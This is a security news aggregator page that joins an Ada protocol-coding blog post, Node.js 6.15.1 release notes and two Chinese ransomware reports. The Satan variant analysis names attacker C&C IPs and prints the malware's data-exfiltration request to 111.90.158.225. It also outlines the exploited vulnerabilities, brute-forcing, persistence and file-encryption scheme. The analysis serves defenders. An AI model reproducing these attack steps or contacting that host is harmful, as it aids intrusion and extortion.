Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all 12749 articles
Browse latest View live

SMG Comms Chapter 10: Actions and RSA Keys

$
0
0

~ This is a work in progress towards an Ada implementation of Eulora's communication protocol. Start withChapter 1.~

Eulora's communication protocol uses RSA keys only for new players who don't yet have a set of Serpent keys agreed on for communication with the server. The main reason for not using RSA for all client-server communications is simply that RSA is essentially too expensive for that. As it happens, it turns out thatrepublican RSA with its fixed-size 256 octets (2048 bits) public exponent is anyway too expensive even for this reduced role - communicating all those octets to the server inside a RSA package takes quite a lot of space. As a result, Eulora will use a smaller e, on only 8 octets (64 bits) that fit neatly into the message structure for requesting a new account in the game (5.1 RSA key set). This means of course that I'll also have to patchEuCrypt to allow arbitrary size of the public exponent in order to have a way to actually generate such RSA key pairs but this will have to be the next step and another post on its own. For now, at the level of read/write from/to SMG Comms messages, there's no direct concern with the crypto lib itself: the e will simply be 8 octets long at its specified place in the message and that is that.

Since the RSA Key Set message includes also some client information (protocol version and subversion, client hash, preferred padding), I've first defined a new data structure (in data_structs.ads) to hold all this in one place:

type Player_RSA is record -- communication protocol Version number Proto_V : Interfaces.Unsigned_8; -- communication protocol Subversion number Proto_Subv : Interfaces.Unsigned_16; -- Keccak hash of client binary Client_Hash: Raw_Types.Octets_8; -- public exponent (e) of RSA key (64 bits precisely) -- nb: this is protocol-specific e, aka shorter than TMSR e... e : Raw_Types.Octets_8; -- public modulus (n) of RSA key (490 bits precisely) n : Raw_Types.RSA_len; -- preferred padding; magic value 0x13370000 means random padding Padding : Raw_Types.Octets_8; end record;

The choice to have the new structure shown above comes mainly from the fact that all the information in there is on one hand related (as it belongs to and describes one specific player at any given time) and on the other hand of no direct concern to this part of code. In other words, this part of the code reads and writes that information together but it has no idea regarding its use (nor should it have). It's for this same reason also that I preferred to keep e and n simply as members like any others of the Player_RSA record rather than having them stored already inside a RSA_pkey structure. For one thing there's no need for the read/write part to even know about the RSA_pkey structure (which is defined in rsa_oaep.ads where it belongs). And for another thing, having e and n as members of the record just like any others keeps the code both clear and easy to change in principle at a later time. Basically the read/write do as little as they can get away with - there is even no attempt to interpret e for instance as a number although its reduced size makes that possible here. Note that the protocol version and subversion are however interpreted as integers but in their case there's no point to keep them as raw octets. On the other hand, the choice of padding is kept as raw octets precisely because this is how it will be needed and used anyway.

Choosing the correct place for storing the padding option also gave me a bit to think about because it's not fully clear to me at this stage exactly where the padding belongs. Strictly speaking, padding is entirely the job of this level so there shouldn't normally be any leaking outside/upwards of anything to do with it. However, having the ability to choose types of padding means that the protocol itself effectively pushes this particular aspect upwards since it's the user ultimately who makes this choice. As a result, I decided to keep the mechanics of padding local (i.e. actual padding of messages + the magic value for requesting random padding + the interpretation of a padding parameter) while providing this Padding value in the Player_RSA record and otherwise refactoring all the Write procedures to require a Padding parameter indicating the desired choice of padding for that write. Moreover, to have this padding stuff in one single place, I also extracted the writing of counter+padding into its own procedure and then refactored all the Write procedures to call this one (since ALL messages always have at the end precisely a counter + padding). The main benefit to this is that it reduces the chances of making an error in one of the multiple places where otherwise one has to write the counter and then check the requested padding and then pad (if needed) accordingly. Other than this benefit, there isn't necessarily a big reduction in number of code lines nor really much an increase in clarity of the code since there is another procedure call to follow in there. Nevertheless, the alternative is worse: having copy-pasted same stuff in every write procedure and having to change all of it if anything changes. So here's the new Write_End procedure which is private to the Messages package since this is just a helper for all the other Write procedures:

-- Writes Counter and padding (rng or otherwise) into Msg starting from Pos. procedure Write_End( Msg : in out Raw_Types.Octets; Pos : in out Natural; Counter : in Interfaces.Unsigned_16; Padding : in Raw_Types.Octets_8) is begin -- check that there is space for Counter at the very least if Pos > Msg'Last - 1 then raise Invalid_Msg; end if; -- write counter Write_U16( Msg, Pos, Counter ); -- pad to the end of the message if Pos <= Msg'Last then if Padding = RNG_PAD then RNG.Get_Octets( Msg( Pos..Msg'Last ) ); else -- repeat the Padding value itself for I in Pos..Msg'Last loop Msg(I) := Padding( Padding'First + (I - Pos) mod Padding'Length ); end loop; end if; -- either rng or fixed, update Pos though Pos := Msg'Last + 1; end if; end Write_End;

After the above changes, the read/write procedures for RSA key set from/to RSA messages are quite straightforward to write:

procedure Write_RKeys_RMsg( K : in Player_RSA; Counter : in Interfaces.Unsigned_16; Pad : in Raw_Types.Octets_8; Msg : out Raw_Types.RSA_Msg) is Pos : Natural := Msg'First + 1; begin -- write correct message type Msg( Msg'First ) := RKeys_R_Type; -- write protocol version and subversion Msg( Pos ) := K.Proto_V; Pos := Pos + 1; Write_U16( Msg, Pos, K.Proto_Subv ); -- write keccak hash of client binary Msg( Pos..Pos + K.Client_Hash'Length-1 ) := K.Client_Hash; Pos := Pos + K.Client_Hash'Length; -- write e of RSA key Msg( Pos..Pos + K.e'Length - 1 ) := K.e; Pos := Pos + K.e'Length; -- write n of RSA key Msg( Pos..Pos + K.n'Length - 1 ) := K.n; Pos := Pos + K.n'Length; -- write preferred padding Msg( Pos..Pos + K.Padding'Length - 1 ) := K.Padding; Pos := Pos + K.Padding'Length; -- write counter + padding Write_End( Msg, Pos, Counter, Pad ); end Write_RKeys_RMsg; -- Reads a RSA Keyset (Player_RSA structures) from the given RSA Message. -- Opposite of Write_RKeys_RMsg above procedure Read_RKeys_RMsg( Msg : in Raw_Types.RSA_Msg; Counter : out Interfaces.Unsigned_16; K : out Player_RSA) is Pos : Natural := Msg'First + 1; begin -- check type id and raise exception if incorrect if Msg(Msg'First) /= RKeys_R_Type then raise Invalid_Msg; end if; -- read protocol version and subversion K.Proto_V := Msg( Pos ); Pos := Pos + 1; Read_U16( Msg, Pos, K.Proto_Subv ); -- read Keccak hash of client binary K.Client_Hash := Msg( Pos..Pos+K.Client_Hash'Length - 1 ); Pos := Pos + K.Client_Hash'Length; -- read e K.e := Msg( Pos .. Pos + K.e'Length - 1 ); Pos := Pos + K.e'Length; -- read n K.n := Msg( Pos .. Pos + K.n'Length - 1 ); Pos := Pos + K.n'Length; -- read choice of padding K.Padding := Msg( Pos .. Pos+K.Padding'Length - 1 ); Pos := Pos + K.Padding'Length; -- read message counter Read_U16( Msg, Pos, Counter ); -- the rest is message padding, so ignore it end Read_RKeys_RMsg;

As usual, I also wrote the tests for all the new procedures, including the private Write_End. However, the testing package as it was could not directly call this private procedure from Messages. My solution to this is to change the declaration of the testing package so that it is effectively derived from Messages - at the end of the day it makes sense that the tester simply needs to get to all the private bits and pieces. This change makes however for a lot of noise in the .vpatch but that's how it is. The new test procedure for the counter+padding is - quite as usual - longer than the code it tests:

procedure Test_Padding is Msg : Raw_Types.Serpent_Msg := (others => 12); Old : Raw_Types.Serpent_Msg := Msg; Pos : Natural := 16; NewPos : Natural := Pos; Counter : Interfaces.Unsigned_16; U16 : Interfaces.Unsigned_16; O2 : Raw_Types.Octets_2; Pad : Raw_Types.Octets_8; Pass : Boolean; begin -- get random counter RNG.Get_Octets( O2 ); Counter := Raw_Types.Cast( O2 ); -- test with random padding Pad := RNG_PAD; Write_End( Msg, NewPos, Counter, Pad ); -- check NewPos and counter Pass := True; if NewPos /= Msg'Last + 1 then Put_Line("FAIL: incorrect Pos value after Write_End with rng."); Pass := False; end if; Read_U16(Msg, Pos, U16); if U16 /= Counter then Put_Line("FAIL: incorrect Counter by Write_End with rng."); Pass := False; end if; -- check that the padding is at least different... if Msg(Pos..Msg'Last) = Old(Pos..Old'Last) or Msg(Pos..Pos+Pad'Length-1) = Pad then Put_Line("FAIL: no padding written by Write_End with rng."); Pass := False; end if; if Pass then Put_Line("PASS: Write_End with rng."); end if; -- prepare for the next test Pass := True; Pos := Pos - 2; NewPos := Pos; Msg := Old; -- get random padding RNG.Get_Octets( Pad ); -- write with fixed padding and check Write_End( Msg, NewPos, Counter, Pad ); Pass := True; if NewPos = Msg'Last + 1 then -- check counter + padding Read_U16( Msg, Pos, U16 ); if U16 /= Counter then Put_Line("FAIL: Counter was not written by Write_End."); Pass := False; end if; for I in Pos..Msg'Last loop if Msg( I ) /= Pad( Pad'First + (I - Pos) mod Pad'Length ) then Put_Line("FAIL: Msg(" & Natural'Image(I) & ")=" & Unsigned_8'Image(Msg(I)) & " /= Pad(" & Natural'Image(Pad'First+(I-Pos) mod Pad'Length) & ") which is " & Unsigned_8'Image(Pad(Pad'First+(I-Pos) mod Pad'Length))); Pass := False; end if; end loop; else Put_Line("FAIL: Pos is wrong after call to Write_End."); Pass := False; end if; if Pass then Put_Line("PASS: test for Write_End with fixed padding."); end if; end Test_Padding;

With the above read/write of a RSA key set, all the RSA messages specified in the protocol are provided. Of the Serpent messages, those not implemented are the Client Action, World Bulletin, Object Request and Object Info. All of those still require some details to be filled in but for the moment I went ahead and implemented read/write for Client Action based on a text representation of the action itself (i.e. precisely as specified in the protocol for 4.5 although the action can be/is in principle a fully specified structure by itself as described in section 7 of the specification). At this stage I'm not yet sure whether to provide another layer of read/write for that action text or whether to attempt to read/write directly the Action structures. So this will have to wait and as details are becoming clearer, the code will get changed /added to, no big deal. Anyway, the Write_Action and Read_Action for now:

-- writes the action (octets+length) into the specified Serpent message procedure Write_Action( A : in Raw_Types.Text_Octets; Counter : in Interfaces.Unsigned_16; Pad : in Raw_Types.Octets_8; Msg : out Raw_Types.Serpent_Msg) is Pos : Natural := Msg'First + 1; MaxPos : Natural := Msg'Last - 1; --2 octets reserved for counter at end U16 : Interfaces.Unsigned_16; begin -- check whether given action FITS into a Serpent message if Pos + 2 + A.Len > MaxPos then raise Invalid_Msg; end if; -- write correct type ID Msg( Msg'First ) := Client_Action_S_Type; -- write action's TOTAL length U16 := Interfaces.Unsigned_16(A.Len + 2); Write_U16( Msg, Pos, U16 ); -- write the action itself Msg( Pos..Pos+A.Len-1 ) := A.Content; Pos := Pos + A.Len; -- write counter + padding Write_End( Msg, Pos, Counter, Pad ); end Write_Action; -- reads a client action as octets+length from the given Serpent message procedure Read_Action( Msg : in Raw_Types.Serpent_Msg; Counter : out Interfaces.Unsigned_16; A : out Raw_Types.Text_Octets) is Pos : Natural := Msg'First + 1; U16 : Interfaces.Unsigned_16; begin -- read and check message type ID if Msg( Msg'First ) /= Client_Action_S_Type then raise Invalid_Msg; end if; -- read size of action (content+ 2 octets the size itself) Read_U16( Msg, Pos, U16 ); -- check size if U16 < 3 or Pos + Natural(U16) - 2 > Msg'Last - 1 then raise Invalid_Msg; else U16 := U16 - 2; --size of content only end if; -- create action, read it from message + assign to output variable declare Act : Raw_Types.Text_Octets( Raw_Types.Text_Len( U16 ) ); begin Act.Content := Msg( Pos..Pos+Act.Len-1 ); Pos := Pos + Act.Len; A := Act; end; -- read counter Read_U16( Msg, Pos, Counter ); end Read_Action;

As previously with the components of a RSA key, I chose to keep the "action" as raw octets rather than "text" aka String. This can be easily changed later if needed but for now I fail to see any concrete benefit in doing the conversion to and from String. The new Text_Octets type is defined in Raw_Types and I moved there the definition of Text_Len (previously in Messages) as well since it's a better place for it:

-- length of a text field (i.e. 16 bits, strictly > 0) subtype Text_Len is Positive range 1..2**16-1; -- "text" type has a 2-byte header with total length -- Len here is length of actual content ONLY (i.e. it needs + 2 for total) type Text_Octets( Len: Text_Len := 1 ) is record -- actual octets making up the "text" Content: Octets( 1..Len ) := (others => 0); end record;

There is of course new testing code for the read/write action procedures as well:

procedure Serialize_Action is O2 : Raw_Types.Octets_2; U16: Interfaces.Unsigned_16; Len: Raw_Types.Text_Len; Counter: Interfaces.Unsigned_16; begin Put_Line("Generating a random action for testing."); -- generate random counter RNG.Get_Octets( O2 ); Counter := Raw_Types.Cast( O2 ); -- generate action length RNG.Get_Octets( O2 ); U16 := Raw_Types.Cast( O2 ); if U16 < 1 then U16 := 1; else if U16 + 5 > Raw_Types.Serpent_Msg'Length then U16 := Raw_Types.Serpent_Msg'Length - 5; end if; end if; Len := Raw_Types.Text_Len( U16 ); declare A: Raw_Types.Text_Octets( Len ); B: Raw_Types.Text_Octets; Msg: Raw_Types.Serpent_Msg; ReadC : Interfaces.Unsigned_16; begin RNG.Get_Octets( A.Content ); begin Write_Action( A, Counter, RNG_PAD, Msg ); Read_Action( Msg, ReadC, B ); if B /= A then Put_Line("FAIL: read/write of Action."); else Put_Line("PASS: read/write of Action."); end if; exception when Invalid_Msg => if Len + 5 > Raw_Types.Serpent_Msg'Length then Put_Line("PASS: exception correctly raised for Action too long"); else Put_Line("FAIL: exception INCORRECTLY raised at action r/w!"); end if; end; end; end Serialize_Action;

The (rather lengthy) .vpatch for all the above and my signature for it can be found on myReference Code Shelf as usual or through those links:

smg_comms_actions_rsa.vpatch smg_comms_actions_rsa.vpatch.diana_coman.sig

The next step now is to patch the rsa/oaep part of SMG Comms to use the 8-octets public exponent and then to get back to EuCrypt and patch it to allow arbitrary size public exponent - so much for fixed size. In other words, it's a very good opportunity to re-read and review EuCrypt!


Satan变种病毒分析处置手册

$
0
0

Satan变种病毒分析处置手册

阅读: 231

2018年11月底,国内多个金融客户感染了跨平台的勒索病毒,该病毒是上述蠕虫FT.exe的变种版本,病毒会释放门罗币挖矿程序和勒索软件。该勒索病毒可以在linuxwindows平台进行蠕虫式传播,并将本地文件加密为.lucky后缀,释放勒索信息文件_How_To_Decrypt_My_File_。

目前黑客的C&C服务器仍然存活,不排除有大面积感染的风险,请相关用户引起关注,及时做好防护措施,相关的IoC信息可参考附录。

■ 危害等级 高,Satan变种病毒已出现新变种,感染范围较广,可以同时感染Linux和Windows主机。

■ TAG Satan、蠕虫病毒、文件加密

文章目录

Satan变种-Windows平台 conn模块对各漏洞的攻击代码 JBoss反序列化漏洞利用 JBoss默认配置漏洞(CVE-2010-0738) Tomcat任意文件上传漏洞(CVE-2017-12615) Tomcat web管理后台弱口令爆破 WebLogic 任意文件上传漏洞(CVE-2018-2894) Weblogic WLS 组件漏洞(CVE-2017-10271) Windows SMB远程代码执行漏洞MS17-010 Apache Struts2远程代码执行漏洞S2-045 Apache Struts2远程代码执行漏洞S2-057 Spring Data Commons远程代码执行漏洞(CVE-2018-1273) Satan变种病毒分析处置手册完整版下载 一. 背景介绍

2018年11月初,绿盟科技发现部分金融客户感染了linux和windows跨平台的蠕虫病毒样本FT.exe,其采用类似Satan勒索病毒的传播渠道,利用多个应用漏洞进行传播。该蠕虫病毒进入系统后无明显破坏行为,仅传播自身。

2018年11月底,国内多个金融客户感染了跨平台的勒索病毒,该病毒是上述蠕虫FT.exe的变种版本,病毒会释放门罗币挖矿程序和勒索软件。该勒索病毒可以在Linux和Windows平台进行蠕虫式传播,并将本地文件加密为.lucky后缀,释放勒索信息文件_How_To_Decrypt_My_File_。

目前黑客的C&C服务器仍然存活,不排除有大面积感染的风险,请相关用户引起关注,及时做好防护措施,相关的IoC信息可参考附录。


Satan变种病毒分析处置手册
Satan变种病毒分析处置手册
二. 病毒分析 2.1 传播方式

Satan病毒家族通过下面8种通用漏洞进行传播。目前发现Satan在linux平台会进行内部IP遍历+端口列表的方式进行漏洞扫描。在windows平台会以IP列表+端口列表的方式进行漏洞扫描。

1. JBoss反序列化漏洞

2. JBoss默认配置漏洞(CVE-2010-0738)

3. Tomcat任意文件上传漏洞(CVE-2017-12615)

4. Tomcat web管理后台弱口令爆破

5. WebLogic 任意文件上传漏洞(CVE-2018-2894)

6. Weblogic WLS 组件漏洞(CVE-2017-10271)

7. Windows SMB远程代码执行漏洞MS17-010

8. Apache Struts2远程代码执行漏洞S2-045

9. Apache Struts2远程代码执行漏洞S2-057

10. Spring Data Commons远程代码执行漏洞(CVE-2018-1273)

2.2 影响范围

Linux系统和Windows系统

2.3 近期版本变更

V1.10

linux和windows跨平台的蠕虫病毒, 进入系统后无明显破坏行为,仅传播自身。

V1.13

增加了勒索病毒模块,可以将本地文件加密为.lucky后缀,释放勒索信息文件_How_To_Decrypt_My_File_。

2.4 病毒行为

由于此次Satan变种病毒可以在Linux和Windows跨平台传播,所以需要对病毒行为进行分别分析。

Satan变种-Linux平台

Satan变种分为4个模块程序,包括ft32,conn32,cry32,mn32。都是32位linux程序,同样每个模块都有对应的64位版本的程序,相应的以64为文件名的后缀。

ft模块

ft32是Satan变种的主模块,负责下载其他模块程序并执行。该程序启动后会检测自身文件名是否为.loop,如果自身文件名不是.loop,会将自身复制到当前目录。同时结束ft32进程,启动.loop程序进行后续行为。

以.loop文件名启动之后,首先会下载mn32/64,conn32/64,cry32/64三个文件,保存到本地,保存的文件名分别为.data,.conn,.crypt。对应的样本代码逻辑如下。


Satan变种病毒分析处置手册

下载其他模块程序完成后,进入sub_804A52A函数,进行后续操作。


Satan变种病毒分析处置手册

第一步,尝试链接CC服务器,尝试对4个IP地址进行HTTP访问,如果此IP地址存活,则将其保存为后续的通讯地址。下图代码为分别对111.90.158.225、107.179.65.195和23.247.83.135进行尝试性HTTP访问,如果通过HTTP请求获取到字符串,则将该IP地址保存为之后的CC服务器通讯地址。


Satan变种病毒分析处置手册

第二步,在sub_8049719函数中使用了三种方式实现开机自启。

1. 首先通过修改计划任务文件,实现开机自启。

2. 通过创建/etc/rc6.d/S20loop服务,实现开机自启。

3. 通过修改rc.local文件,实现开机自启。

第三步,构造通信数据,使用的请求如下。


Satan变种病毒分析处置手册
conn模块

该模块为Lucky样本的漏洞利用模块,自身同样使用upx压缩加壳,脱壳后大小为4000KB。Lucky样本的漏洞利用模块复用了Satan病毒的相关代码,对外进行的攻击类型一致。

此模块运行之后首先获取自身网段的地址,然后加载一个大小为230的端口列表(端口列表见附录C)。通过自身网段的遍历和端口列表的组合,进行端口扫描。分析时样本产生的网络行为。


Satan变种病毒分析处置手册

如果发现可用的IP与端口,则尝试进行触发漏洞。尝试触发的漏洞类型包括以下10种:

1. JBoss反序列化漏洞(CVE-2013-4810、CVE-2017-12149)

2. JBoss默认配置漏洞(CVE-2010-0738)

3. Tomcat任意文件上传漏洞(CVE-2017-12615)

4. Tomcat web管理后台弱口令爆破

5. WebLogic 任意文件上传漏洞(CVE-2018-2894)

6. Weblogic WLS 组件漏洞(CVE-2017-10271)

7. Windows SMB远程代码执行漏洞MS17-010

8. Apache Struts2远程代码执行漏洞S2-045

9. Apache Struts2远程代码执行漏洞S2-057

10. Spring Data Commons远程代码执行漏洞(CVE-2018-1273)

下图为利用Tomcat上传漏洞是上传的jsp文件。


Satan变种病毒分析处置手册

此模块除了尝试以上对web中间件的扫描攻击,还会对linux的主机口令尝试爆破。爆破的用户包括以下4个:


Satan变种病毒分析处置手册

使用的弱口令列表如下:


Satan变种病毒分析处置手册
cry模块

此模块用于对本地文件的加密,下图为cry模块加密时的白名单,如果被加密的文件保存在下面7个路径中,则不进行加密。


Satan变种病毒分析处置手册

在加密的过程中会将加密文件的参数信息上传到攻击者的111.90.158.225服务器,具体发送的请求如下,其中“xxx”是样本在运行时动态拼接的数据。

111.90.158.225/cyt.php?code=xxx&file=xxx&size=xxx&sys=linux&VRESION=4.3&status=xxx mn模块

此模块是一个xmrig开源挖矿程序,其代码发布在https://github.com/xmrig/xmrig。挖矿地址配置信息如下:


Satan变种病毒分析处置手册
Satan变种-Windows平台 fast.exe

fast.exe是Satan变种的主模块,主要负责下载conn.exe和srv.exe,并使用ShellExecuteA函数对程序进行启动,其中srv.exe启动时使用install参数。


Satan变种病毒分析处置手册
cpt.exe

cpt.exe主要负责加密功能。

选择加密文件的后缀列表如下:

bak,sql,mdf,ldf,myd,myi,dmp,xls,xlsx,docx,pptx,eps,txt,ppt,csv,rtf,pdf,db,vdi,vmdk,vmx,pem,pfx,cer,psd

为了保证系统可以正常运行,样本不会加密以下目录中的文件:

Windows目录python2, python3, boot, i386, 360safe, intel, dvd maker, recycle, jdk, lib, libs, microsoft, 360rec, 360sec, 360sand Liinux目录 /bin/, /boot/, /sbin/, /tmp/, /dev/, /etc/, /lib/, /lib64/, /misc/, /net/, /proc/, /selinux/, /srv/, /sys/, /usr/lib/, /usr/include/, /usr/bin/, /usr/etc/, /usr/games/, /usr/lib64/, /usr/libexec/, /usr/sbin/, /usr/share/, /usr/src/, /usr/tmp/, /var/account/, /var/cache/, /var/crash/, /var/empty/, /var/games/, /var/gdm/, /var/lib/, /var/lock/, /var/log/, /var/nis/, /var/preserve/, /var/spool/, /var/tmp/, /var/yp/, /var/run/

在启动加密之前,样本会通知C&C服务器加密开始,并将status参数设置为begin:


Satan变种病毒分析处置手册

通知流量如下:


Satan变种病毒分析处置手册

样本运行后会生成随机字符串,然后取前32字节作为密钥,使用AES_ECB算法,每次读取16字节对文件进行加密:


Satan变种病毒分析处置手册
所有文件使用同一密钥进行加密,加密成功后样本将原文件重命名为如下形式:[nmare@cock.li]filename.tRD53kRxhtrAl5ss.lucky。完成所有加密工作后,会告知C&C服务器加密完成,并将status参数设置为done:
Satan变种病毒分析处置手册
当全部文件

Node v6.15.1 (LTS)

$
0
0

This is a patch release to address a bad backport of the fix for "Slowloris HTTP Denial of Service" (CVE-2018-12122). Node.js 6.15.0 misapplies the headers timeout to an entire keep-alive HTTP session, resulting in prematurely disconnected sockets.

Users of Node.js 6.x LTS 'Boron' should upgrade to 6.15.1 as soon as possible. Commits [ 5d9005c359 ] - http : fix backport of Slowloris headers (Matteo Collina) #24796

windows 32-bit Installer: https://nodejs.org/dist/v6.15.1/node-v6.15.1-x86.msi

Windows 64-bit Installer: https://nodejs.org/dist/v6.15.1/node-v6.15.1-x64.msi

Windows 32-bit Binary: https://nodejs.org/dist/v6.15.1/win-x86/node.exe

Windows 64-bit Binary: https://nodejs.org/dist/v6.15.1/win-x64/node.exe

macOS 64-bit Installer: https://nodejs.org/dist/v6.15.1/node-v6.15.1.pkg

macOS 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-darwin-x64.tar.gz

linux 32-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-x86.tar.xz

Linux 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-x64.tar.xz

Linux PPC LE 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-ppc64le.tar.xz

Linux PPC BE 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-ppc64.tar.xz

Linux s390x 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-s390x.tar.xz

AIX 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-aix-ppc64.tar.gz

SunOS 32-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-sunos-x86.tar.xz

SunOS 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-sunos-x64.tar.xz

ARMv6 32-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-armv6l.tar.xz

ARMv7 32-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-armv7l.tar.xz

ARMv8 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-arm64.tar.xz

Source Code: https://nodejs.org/dist/v6.15.1/node-v6.15.1.tar.gz

Other release files: https://nodejs.org/dist/v6.15.1/

Documentation: https://nodejs.org/docs/v6.15.1/api/

SHASUMS

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 dcabcb43de205f1946f9cb415c728a5d542345117c9a61a506c587b4c7c01b52 node-v6.15.1-aix-ppc64.tar.gz febce60c9ca2d9798483b005e287389ec643edd58a749d66bafc0d02d497061f node-v6.15.1-darwin-x64.tar.gz 82d9f7477a72742a7aba679ecc74f4de7f6c0b6236a423f62e19be82442f4fdc node-v6.15.1-darwin-x64.tar.xz fbf18a7e7474f4a8de2a45233d9229a558a2149a509b183d6d9a1d2753eab69b node-v6.15.1-headers.tar.gz 929f7be7d51dd73cf75609c6e178fccb0ce7f8784dbf64c0ebfc1155f7226cd1 node-v6.15.1-headers.tar.xz 436bbf8467418afb8d505cbaf9203dba27103020f8289975d383c3e97872428d node-v6.15.1-linux-arm64.tar.gz 8a5d9d08af4bffee4ff2023370a050a921f14ca38d2e43b695932e1550dd0e4a node-v6.15.1-linux-arm64.tar.xz acc3d7a994e928e027b4738469e63292dd2da8e8bf42f3a3cec9c459eab15252 node-v6.15.1-linux-armv6l.tar.gz d32eabb3169b536fb2f83f7cda314305e23f0017eb550e5efb5314a879763d02 node-v6.15.1-linux-armv6l.tar.xz c794d8a3f1d9ec9bbd57671a57583a3dca7f4f099d9c06b5ab7bc7c075c522bd node-v6.15.1-linux-armv7l.tar.gz 86450c1c3679d855b578791b7702c3d805df182fa63317ab92ac427a340148f6 node-v6.15.1-linux-armv7l.tar.xz 70d63aa325b8ee7a121fa878e5abd5fcce603ba4172d7fc0e667fe39b00ae291 node-v6.15.1-linux-ppc64le.tar.gz 10517e871477b173e4e6f9818013b45b53fb6c39e330561b8d9b5e85e7983029 node-v6.15.1-linux-ppc64le.tar.xz 1b0fffb2e9fff929f8f41ed29b6585e12fd230854da2196d48cc49f0579b6227 node-v6.15.1-linux-ppc64.tar.gz 49bdca00e1f76e7fe0d7147a46382aaee0752cf9f9894180e0dc4657a862dc4e node-v6.15.1-linux-ppc64.tar.xz a22db341ffc22101d2392eed9212a1bc05d94d11b621fecd321fe8b57b139c87 node-v6.15.1-linux-s390x.tar.gz 9783db5be4652ec97e82e5c02b44776bc4f7405e741c9f4822590f1fdd22085d node-v6.15.1-linux-s390x.tar.xz aa8ef47382853d7124110203c3773515cff00737f1cd7bce98bd388603141c6d node-v6.15.1-linux-x64.tar.gz bc39a08ef41712d974c87f0a323b13d2c3f2320cf4f1683f0e6293fc7179a872 node-v6.15.1-linux-x64.tar.xz 8790767b3f6bcd99df81d3e486482799ebeba87bc5352b5b3b7623caf51900df node-v6.15.1-linux-x86.tar.gz 659576fd9c2de75b4ccc210a815495ed3be0aa979ce2e6f9e12a25dd3c415029 node-v6.15.1-linux-x86.tar.xz 4e3675e929506a2ec05f232cb220995ac2c31f7e8c6e2d6b46dabffaedc51075 node-v6.15.1.pkg 0aaeeb4514d7859425b72ceb252451fa8794126b3b6b153a63549a6ae377d147 node-v6.15.1-sunos-x64.tar.gz c40c4478475b3f93f9e588506d40ed57e8807dae569f3f9ddc294058a0ab371a node-v6.15.1-sunos-x64.tar.xz 6ae54f400b126ff535c31d1a7f8d795344977e83e334cdfe610c85bad85a88cc node-v6.15.1-sunos-x86.tar.gz 63a962748304edcbfbe345db1f1f51cc420517e904c74e3e578c2319a614e520 node-v6.15.1-sunos-x86.tar.xz 3e08c82c95ab32f476199369e894b48d70cbaaaa12c1b67f60584c618a6eb0ca node-v6.15.1.tar.gz c3bde58a904b5000a88fbad3de630d432693bc6d9d6fec60a5a19e68498129c2 node-v6.15.1.tar.xz 75469afe2bf47868844d84196567180d19e54574787e1cda328227240b8b1b26 node-v6.15.1-win-x64.7z be2e51d8d62f41be97e8c64011d1e3f32394e2d45b044f49eeb17b11ec77c7e6 node-v6.15.1-win-x64.zip 7acbcea9501df79c8261c2dd9bbb1e452cf98560ccebb178da9bc9b92257b13b node-v6.15.1-win-x86.7z 90f17b524ffe6da2369b90fd507dea9bbad3f7608e8adc1a205de025fb6d3df9 node-v6.15.1-win-x86.zip 9fda93a5ad0fc2b5ef8bddcae697365b4ffce6a366814d4adf22ed813f189d8d node-v6.15.1-x64.msi 7c085e59ebdd8fc9a2090b3c68765acc2314e8fce347f468f67e70420e238a3a node-v6.15.1-x86.msi b8ee12c5a87b26a11f9aa31ba84905912ebcf21768eeba97a0471d08fc504296 win-x64/node.exe d806ff42433597ddafb2092cc7d003cf2171630ef2eaf150afdbebe390774542 win-x64/node.lib db2bbc5b26e945acd4e54e6843c2ff6445000d3c62dd702b094ee0ca3f3ea474 win-x64/node_pdb.7z 15ce2d8f1232c84c8975d7ee56c676097cb39cb6c2a8f4ea0e2ba400b57e6484 win-x64/node_pdb.zip 76b680db25993dd707911c4772630c38ad997579d9b024fb857c60be5b70d43a win-x86/node.exe 4d2ddebf5511cde7f001e9e8312d0a71ec21bc00697990cea44c9fdb3a1488ab win-x86/node.lib d789353a2e91b4a8ea831388e4f73044bedc2a78d842e7bece22f6d3801b5137 win-x86/node_pdb.7z c651483ba0451e470f7e66f6d6a0a0ed6dc249cf176cfa88c5afe6cfcf85afe5 win-x86/node_pdb.zip -----BEGIN PGP SIGNATURE----- iQEzBAEBCAAdFiEE3Y8jOLrnUB491ax4wnN5L32DVF0FAlwFOegACgkQwnN5L32D VF1u3wf+JSxl7s0NQYqSZcQErXzOcyOR3Ox8T81DM9MjnT2YIths8I8tMIutmc8D yuMjkib0A5+lZkNRswMQAGZI58q6vwycUIxgbLJcAsNzbSHf3aGHx5wVeC8wxwUM FQU+5G8Qt7DAFyI2K3h9D0iKie8/xgbYRrU9YvIj3U+9GOwoyHFYlAsgfiI8UJSh klXxrYlRUhuyOj6yOLTMm60ANT2NOF5EbgyLVHFvMGEMROX785N6oC9qoYbuPX5V Q4y9ZBtMMWu+1wkhQkrm+V0QdPT+VRpgxpc6a1PzCBI/3zocIRpc4m/GLupTbI+M lP0m7nBWyRiOjV2O12mze/gIRbVfMA== =n+/G -----END PGP SIGNATURE-----

勒索病毒都开始扫码要赎金了

$
0
0

12月2日凌晨,360发布消息称:360互联网安全中心日前发现一款名为“ UNNAMED1989 ”的勒索病毒,该病毒系国人自主研发,通过伪造成私服、外挂工具进行传播。目前, 360已首家发布病毒预警并于12月2日凌晨上线解密工具,可有效拦截该勒索病毒的攻击,已经中招的用户亦可使用360解密大师进行破解。


勒索病毒都开始扫码要赎金了

据悉,用户一旦遭遇该勒索病毒攻击,电脑桌面上的文件即被加密。饶有趣味的是:该勒索病毒会跳过一些指定名称开头的目录文件,比如“腾讯游戏”、“英雄联盟”等,而且不会感染使用gif、exe、tmp等扩展名的文件。

